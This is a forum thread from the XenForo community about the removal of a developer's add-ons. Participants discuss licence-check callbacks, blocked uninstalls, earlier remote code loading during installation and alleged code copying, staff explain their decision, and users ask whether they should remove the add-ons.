******* Resource Removal

[TheBigK]

Remove all callbacks from your addons

Could you please explain in brief what exactly was the issue?

 

[tajhay]

Could you please explain in brief what exactly was the issue?

1. He had a callback in all his addons whereby on install and uninstall, it would callback to his own servers.
2. Users could not uninstall if they did not have a valid licence, even if they were licensed in the past.
3. ******* could collect data and run arbitary code on OUR servers if we had his addons installed.

This probably has more information:
https://xenforo.com/community/threads/*******-add-on-cannot-be-uninstalled.82731/

It should also be noted that as far as im aware he is not the only developer using such methods. Liam W I believe is another who has begun to remove callbacks. Right now Xenforo guidelines state that you must include information about your callbacks upfront in the resource description.

Edit - Apologies if i got any of this wrong. The thread referenced should be your point of info.

 

[Brent W]

I never had a problem with callbacks on Install. It was the Uninstall callbacks that were ridiculous. DigitalPoint uses callbacks in his in this manner.

 

[Brivium]

@tajhay

As you know, we have updated our products and we have noticed at https://*******.com/threads/notice-of-updates-to-privacy-policy-tos.836/

We just collected Forum URL information to check the license when installing. However, it’s hard to prove this for somebody who does not understand about code. We are in a private talk with Xen staffs about this, to ensure the privilege of customers and developers.

We do not go through your data in any way or get information from any customer.

Regards,

 

[HWS]

He had a callback in all his addons whereby on install and uninstall, it would callback to his own servers.

A simple callback was never a problem and is still included in his add-ons. He checks the installation domain with his database and denies install if not licensed. This is what several developers do.

The FORMER problem with him was that he backloaded additional MySQL and/or PHP code from his server during the installation.

But he changed his installation routine after the guide lines were published and currently does not backload any code and also does not use a callback at uninstall. Hopefully it will stay this way.

 

[Brivium]

A simple callback was never a problem and is still included in his add-ons. He checks the installation domain with his database and denies install if not licensed. This is what several developers do.

The FORMER problem with him was that he backloaded additional MySQL and/or PHP code from his server during the installation.

But he changed his installation routine after the guide lines were published and currently does not backload any code and also does not use a callback at uninstall. Hopefully it will stay this way.

Hi HWS,

We would love to say thank you for your explaination. It's hard for us to say directly like you sad. Anyway, thank you again for telling for us. We do appreciate and thank god for your knowledge.

Best,

 

[rafass]

We all make mistakes in life.
Everyone deserves a second chance too.
As client of ******* and XenForo lover I hope the community continues to growing up.
I will continue to rely on *******, he's an excellent developer with a great products, and I am pretty sure they will do everything possible to restore the confidence of everyone.
My best wishes.
Peace and love to everyone.

 

[Pavle123]

So I guess this is what all of us, who are not that technical, but own an XF forum and ******* plugin wants to know :

1. Should we uninstall everything by *******? Is this what XF recommends for security reasons?
2. How can we be sure that everything is removed, since they did some strange things from what I understood?
3. What happens now, when some essential plugins we used are gone?

I have only one plugin by them, but there is no alternative at the moment on RM. I can only imagine how guys with lots of ******* plugins feel right now.

 

[Paul B]

Should we uninstall everything by *******? Is this what XF recommends for security reasons?

That is a decision you need to make. We have no access to most of the add-ons so can't comment on the code.

How can we be sure that everything is removed, since they did some strange things from what I understood?

Post on the specific add-on thread for support with it.

What happens now, when some essential plugins we used are gone?

Commission a developer to make any you require, wait for them to be developed independently, continue using ******* add-ons, or do without.

 

[Mike]

I just want to refer back to my previous post:

https://xenforo.com/community/threads/*******-resource-removal.92263/page-2#post-892714

The issues leading to our actions were not security related; the major issues did not even involve code. However, as we do not audit resources in general (and we have no access to the majority of paid ones), we could not say that any given add-on is "safe". It's unlikely that someone would intentionally put dangerous code in but it's simply an unknown.

 

[FredC]

as a follow-up question to Mike's previous post, I'm curious if *******s products did or did not contain stolen code from similar resources from other authors? The question is not directed to Mike who has already indicated they are not aware of what is inside of his code, rather other authors who feel he has infringed on their products. This inquiry has nothing to do with starting trouble I simply want to know if I should remove his remaining products as a matter of ethics vs security?

 

[Paul B]

That has already been discussed here: https://xenforo.com/community/threa...nship-with-vxf-vn-and-copyright-issues.91524/

 

[FredC]

That has already been discussed here: https://xenforo.com/community/threa...nship-with-vxf-vn-and-copyright-issues.91524/

so no definitive answer? I can't read code so the proof isn't in the pudding. All I can make out of that thread is nine pages of back-and-forth. I suppose I'll have another go at rereading it again when I have more time later.

 

[RobParker]

so no definitive answer? I can't read code so the proof isn't in the pudding. All I can make out of that thread is nine pages of back-and-forth. I suppose I'll have another go at rereading it again when I have more time later.

The conclusion was that lots of code had been copied and there seemed to be lots of evidence to that effect.

As long as this comes down to dubious copyright practices rather than malicious coding then it's not as worrying for people as it could be.

 

[Paul B]

It relates to a combination of factors, as mentioned in the first post and reiterated by Mike above.

 

[RobParker]

It relates to a combination of factors, as mentioned in the first post and reiterated by Mike above.

"The issues leading to our actions were not security related" sounds pretty clear cut. I know absence of proof isn't proof of absence, etc but it's not like you found a massive security issue that should worry people (although that doesn't mean his, or anyone's, code might not contain one).

 

[Paul B]

As stated, we are unable to say whether there are or are not security related issues with the code, for the simple reason that we do not have access to it and have not audited it.

 

[FredC]

Much appreciated. I had initially intended to keep *******s products on my site until they required updating however I don't want to be regarded as supporting piracy. So as a matter of ethics I think they just need to go.

 

[RobParker]

As stated, we are unable to say whether there are or are not security related issues with the code, for the simple reason that we do not have access to it and have not audited it.

That's surely the same as with anyone's code though and therefore seems irrelevant to the discussion. What would be a worry is if you had looked at it and found a security concern but Mike confirmed that's not the case.

 

[Pinn]

While he has the best addons that sad that you can talk to!